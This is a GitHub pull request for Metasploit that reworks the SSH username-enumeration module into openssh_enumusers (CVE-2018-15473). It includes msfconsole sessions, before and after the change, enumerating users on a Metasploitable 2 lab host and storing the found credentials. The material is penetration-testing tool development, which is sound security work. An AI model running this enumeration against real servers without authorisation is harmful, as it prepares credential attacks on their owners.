Skip to content

ssh_enumusers: Update workspace#21438

Open
g0tmi1k wants to merge 7 commits into
rapid7:masterfrom
g0tmi1k:ssh_enumusers
Open

ssh_enumusers: Update workspace#21438
g0tmi1k wants to merge 7 commits into
rapid7:masterfrom
g0tmi1k:ssh_enumusers

Conversation

@g0tmi1k
Copy link
Copy Markdown
Contributor

@g0tmi1k g0tmi1k commented May 10, 2026
edited
Loading

This PR does a few things:

  • Rename the module as its only for OpenSSH (both actions)
  • Use SSH mixin
  • Add CALIBRATE_COUNT option, so able to auto-calibrate timing
  • Improve output
    • e.g. Checks the OpenSSH version to vulnerable versions and gives feedback if it should/should not be vulnerable to attack/action

Target is Metasploitable 2.

        current  name     hosts  services  vulns  creds  loots  notes
        -------  ----     -----  --------  -----  -----  -----  -----
Before: *        default  0      0         0      0      0      0
After : *        default  1      2         1      1      0      1

Setup

Simple wordlists for users:

$ cat << EOF > /tmp/users.txt
msfadmin
kali
incorrect
EOF
$

Before

  • Scanning ...anything always gave 0
  • All testing was done using master branch
$ ./msfconsole -q -x 'db_status; workspace -D; setg VERBOSE true;
use auxiliary/scanner/ssh/ssh_enumusers;
setg USER_FILE /tmp/users.txt;
options'
[*] Connected to msf. Connection type: postgresql.
[*] Deleted workspace: default
[*] Recreated the default workspace
VERBOSE => true
[*] Setting default action Malformed Packet - view all 2 actions with the show actions command
USER_FILE => /tmp/users.txt

Module options (auxiliary/scanner/ssh/ssh_enumusers):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   CHECK_FALSE   true             no        Check for false positives (random username)
   DB_ALL_USERS  false            no        Add all users in the current database to the list
   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: socks4, socks5, socks5h, http, sapni
   RHOSTS                         yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT         22               yes       The target port
   THREADS       1                yes       The number of concurrent threads (max one per host)
   THRESHOLD     10               yes       Amount of seconds needed before a user is considered found (timing attack only)
   USERNAME                       no        Single username to test (username spray)
   USER_FILE     /tmp/users.txt   no        File containing usernames, one per line


Auxiliary action:

   Name              Description
   ----              -----------
   Malformed Packet  Use a malformed packet



View the full module info with the info, or info -d command.

msf auxiliary(scanner/ssh/ssh_enumusers) >
msf auxiliary(scanner/ssh/ssh_enumusers) > run RHOST=10.0.0.10 RPORT=9999
[*] 10.0.0.10:9999 - SSH - Using malformed packet technique
[*] 10.0.0.10:9999 - SSH - Checking for false positives
[*] 10.0.0.10:9999 - SSH - Retrying 'SG9ehCntRIxAbllSecQ' due to connection error
[*] 10.0.0.10:9999 - SSH - Retrying 'SG9ehCntRIxAbllSecQ' due to connection error
[*] 10.0.0.10:9999 - SSH - Retrying 'SG9ehCntRIxAbllSecQ' due to connection error
[*] 10.0.0.10:9999 - SSH - Starting scan
[*] 10.0.0.10:9999 - SSH - Retrying 'msfadmin' due to connection error
[*] 10.0.0.10:9999 - SSH - Retrying 'msfadmin' due to connection error
[*] 10.0.0.10:9999 - SSH - Retrying 'msfadmin' due to connection error
[-] 10.0.0.10:9999 - SSH - User 'msfadmin' could not connect
[*] 10.0.0.10:9999 - SSH - Retrying 'kali' due to connection error
[*] 10.0.0.10:9999 - SSH - Retrying 'kali' due to connection error
[*] 10.0.0.10:9999 - SSH - Retrying 'kali' due to connection error
[-] 10.0.0.10:9999 - SSH - User 'kali' could not connect
[*] 10.0.0.10:9999 - SSH - Retrying 'incorrect' due to connection error
[*] 10.0.0.10:9999 - SSH - Retrying 'incorrect' due to connection error
[*] 10.0.0.10:9999 - SSH - Retrying 'incorrect' due to connection error
[-] 10.0.0.10:9999 - SSH - User 'incorrect' could not connect
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/ssh/ssh_enumusers) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  0      0         0      0      0      0

msf auxiliary(scanner/ssh/ssh_enumusers) >
msf auxiliary(scanner/ssh/ssh_enumusers) > run RHOST=10.0.0.10 RPORT=21
[*] 10.0.0.10:21 - SSH - Using malformed packet technique
[*] 10.0.0.10:21 - SSH - Checking for false positives
[*] 10.0.0.10:21 - SSH - Starting scan
[-] 10.0.0.10:21 - SSH - User 'msfadmin' not found
[-] 10.0.0.10:21 - SSH - User 'kali' not found
[-] 10.0.0.10:21 - SSH - User 'incorrect' not found
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/ssh/ssh_enumusers) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  0      0         0      0      0      0

msf auxiliary(scanner/ssh/ssh_enumusers) >
msf auxiliary(scanner/ssh/ssh_enumusers) > run RHOST=10.0.0.10
[*] 10.0.0.10:22 - SSH - Using malformed packet technique
[*] 10.0.0.10:22 - SSH - Checking for false positives
[*] 10.0.0.10:22 - SSH - Starting scan
[+] 10.0.0.10:22 - SSH - User 'msfadmin' found
[-] 10.0.0.10:22 - SSH - User 'kali' not found
[-] 10.0.0.10:22 - SSH - User 'incorrect' not found
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/ssh/ssh_enumusers) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  1      1         0      1      0      0

msf auxiliary(scanner/ssh/ssh_enumusers) > hosts

Hosts
=====

address    mac  name  os_name  os_flavor  os_sp  purpose  info  comments
-------    ---  ----  -------  ---------  -----  -------  ----  --------
10.0.0.10

msf auxiliary(scanner/ssh/ssh_enumusers) > services
Services
========

host       port  proto  name  state  info  resource  parents
----       ----  -----  ----  -----  ----  --------  -------
10.0.0.10  22    tcp    ssh   open         {}

msf auxiliary(scanner/ssh/ssh_enumusers) > creds
Credentials
===========

id   host       origin     service       public    private  realm  private_type  JtR Format  cracked_password
--   ----       ------     -------       ------    -------  -----  ------------  ----------  ----------------
570  10.0.0.10  10.0.0.10  22/tcp (ssh)  msfadmin

msf auxiliary(scanner/ssh/ssh_enumusers) >
msf auxiliary(scanner/ssh/ssh_enumusers) > workspace -D
[*] Deleted workspace: default
[*] Recreated the default workspace
msf auxiliary(scanner/ssh/ssh_enumusers) > run RHOST=10.0.0.1
[*] 10.0.0.1:22 - SSH - Using malformed packet technique
[*] 10.0.0.1:22 - SSH - Checking for false positives
[-] 10.0.0.1:22 - SSH - throws false positive results. Aborting.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/ssh/ssh_enumusers) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  0      0         0      0      0      0

msf auxiliary(scanner/ssh/ssh_enumusers) >

After

$ ./msfconsole -q -x 'db_status; workspace -D; setg VERBOSE true;
use auxiliary/scanner/ssh/openssh_enumusers;
setg USER_FILE /tmp/users.txt;
options'
[*] Connected to msf. Connection type: postgresql.
[*] Deleted workspace: default
[*] Recreated the default workspace
VERBOSE => true
[*] Setting default action Malformed Packet - view all 2 actions with the show actions command
USER_FILE => /tmp/users.txt

Module options (auxiliary/scanner/ssh/openssh_enumusers):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   CHECK_FALSE   true             no        Check for false positives (random username)
   DB_ALL_USERS  false            no        Add all users in the current database to the list
   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: socks4, socks5, socks5h, http, sapni
   RHOSTS                         yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT         22               yes       The target port
   THREADS       1                yes       The number of concurrent threads (max one per host)
   THRESHOLD     10               yes       Amount of seconds needed before a user is considered found (timing attack only)
   USERNAME                       no        Single username to test (username spray)
   USER_FILE     /tmp/users.txt   no        File containing usernames, one per line


Auxiliary action:

   Name              Description
   ----              -----------
   Malformed Packet  Use a malformed packet (OpenSSH <= 7.6, CVE-2018-15473)



View the full module info with the info, or info -d command.

msf auxiliary(scanner/ssh/openssh_enumusers) >
msf auxiliary(scanner/ssh/openssh_enumusers) > run RHOST=10.0.0.10 RPORT=9999
[-] 10.0.0.10:9999 - No response (port closed or wrong service)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/ssh/openssh_enumusers) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  1      0         0      0      0      0

msf auxiliary(scanner/ssh/openssh_enumusers) > hosts

Hosts
=====

address    mac  name  os_name  os_flavor  os_sp  purpose  info  comments
-------    ---  ----  -------  ---------  -----  -------  ----  --------
10.0.0.10

msf auxiliary(scanner/ssh/openssh_enumusers) >
msf auxiliary(scanner/ssh/openssh_enumusers) > workspace -D
[*] Deleted workspace: default
[*] Recreated the default workspace
msf auxiliary(scanner/ssh/openssh_enumusers) > run RHOST=10.0.0.10 RPORT=21
[*] 10.0.0.10:21 - SSH banner: 220 (vsFTPd 2.3.4)
[*] 10.0.0.10:21 - Checking for false positives
[*] Loaded 3 users from /tmp/users.txt
[*] 10.0.0.10:21 - Starting SSH username enumeration
[*] 10.0.0.10:21 - User 'msfadmin' not found
[*] 10.0.0.10:21 - User 'kali' not found
[*] 10.0.0.10:21 - User 'incorrect' not found
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/ssh/openssh_enumusers) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  1      1         0      0      0      0

msf auxiliary(scanner/ssh/openssh_enumusers) > services
Services
========

host       port  proto  name  state  info                resource  parents
----       ----  -----  ----  -----  ----                --------  -------
10.0.0.10  21    tcp    ssh   open   220 (vsFTPd 2.3.4)  {}

msf auxiliary(scanner/ssh/openssh_enumusers) >
msf auxiliary(scanner/ssh/openssh_enumusers) > workspace -D
[*] Deleted workspace: default
[*] Recreated the default workspace
msf auxiliary(scanner/ssh/openssh_enumusers) > run RHOST=10.0.0.10
[*] 10.0.0.10:22 - SSH banner: SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1
[*] 10.0.0.10:22 - OpenSSH 4.7 may be vulnerable to Malformed Packet/CVE-2018-15473
[*] 10.0.0.10:22 - Checking for false positives
[*] Loaded 3 users from /tmp/users.txt
[*] 10.0.0.10:22 - Starting SSH username enumeration
[+] 10.0.0.10:22 - User 'msfadmin' found
[*] 10.0.0.10:22 - User 'kali' not found
[*] 10.0.0.10:22 - User 'incorrect' not found
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/ssh/openssh_enumusers) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  1      2         1      1      0      1

msf auxiliary(scanner/ssh/openssh_enumusers) > hosts

Hosts
=====

address    mac  name  os_name  os_flavor  os_sp  purpose  info  comments
-------    ---  ----  -------  ---------  -----  -------  ----  --------
10.0.0.10             Linux    Ubuntu     8.04   server

msf auxiliary(scanner/ssh/openssh_enumusers) > services
Services
========

host       port  proto  name  state  info                                   resource  parents
----       ----  -----  ----  -----  ----                                   --------  -------
10.0.0.10  22    tcp    ssh   open   SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1  {}        tcp (22/tcp)
10.0.0.10  22    tcp    tcp   open                                          {}

msf auxiliary(scanner/ssh/openssh_enumusers) > vulns

Vulnerabilities
===============

Timestamp                Host       Service       Resource  Name                                          References
---------                ----       -------       --------  ----                                          ----------
2026-05-26 20:23:00 UTC  10.0.0.10  ssh (22/tcp)  {}        OpenSSH 7.6 And Earlier Username Enumeration  CVE-2003-0190,CVE-2006-5229,CVE-2016-6210,CVE-2018-15473,OSVDB-32721,BID-20418,URL-https://seclists.
                                                                                                          org/oss-sec/2018/q3/124,URL-https://sekurak.pl/openssh-users-enumeration-cve-2018-15473/

msf auxiliary(scanner/ssh/openssh_enumusers) > creds
Credentials
===========

id   host       origin     service       public    private  realm  private_type  JtR Format  cracked_password
--   ----       ------     -------       ------    -------  -----  ------------  ----------  ----------------
572  10.0.0.10  10.0.0.10  22/tcp (ssh)  msfadmin

msf auxiliary(scanner/ssh/openssh_enumusers) > notes

Notes
=====

 Time                     Host       Service  Port  Protocol  Type     Data
 ----                     ----       -------  ----  --------  ----     ----
 2026-05-26 20:23:00 UTC  10.0.0.10  ssh      22    tcp       ssh.cpe  {:cpe=>"cpe:/o:canonical:ubuntu_linux:8.04"}

msf auxiliary(scanner/ssh/openssh_enumusers) >

@g0tmi1k g0tmi1k force-pushed the ssh_enumusers branch 5 times, most recently from 10138b7 to 63b445b Compare May 14, 2026 13:07
@g0tmi1k g0tmi1k force-pushed the ssh_enumusers branch 6 times, most recently from 560e72c to fc6014b Compare May 19, 2026 15:11
@g0tmi1k g0tmi1k marked this pull request as draft May 21, 2026 13:49
@g0tmi1k g0tmi1k force-pushed the ssh_enumusers branch 4 times, most recently from 13c7619 to 377b7a7 Compare May 22, 2026 20:54
@g0tmi1k g0tmi1k changed the title ssh_enumusers: Various improvements ssh_enumusers: Update workspace May 26, 2026
@g0tmi1k g0tmi1k marked this pull request as ready for review May 26, 2026 20:28
@g0tmi1k
Copy link
Copy Markdown
Contributor Author

g0tmi1k commented May 26, 2026

Think I've finished tweaking with this PR!

@g0tmi1k g0tmi1k mentioned this pull request May 27, 2026
Open
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

No reviews

Assignees

No one assigned

Labels

enhancement

Projects

Metasploit Kanban
Status: Todo

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

3 participants

@g0tmi1k @h00die @smcintyre-r7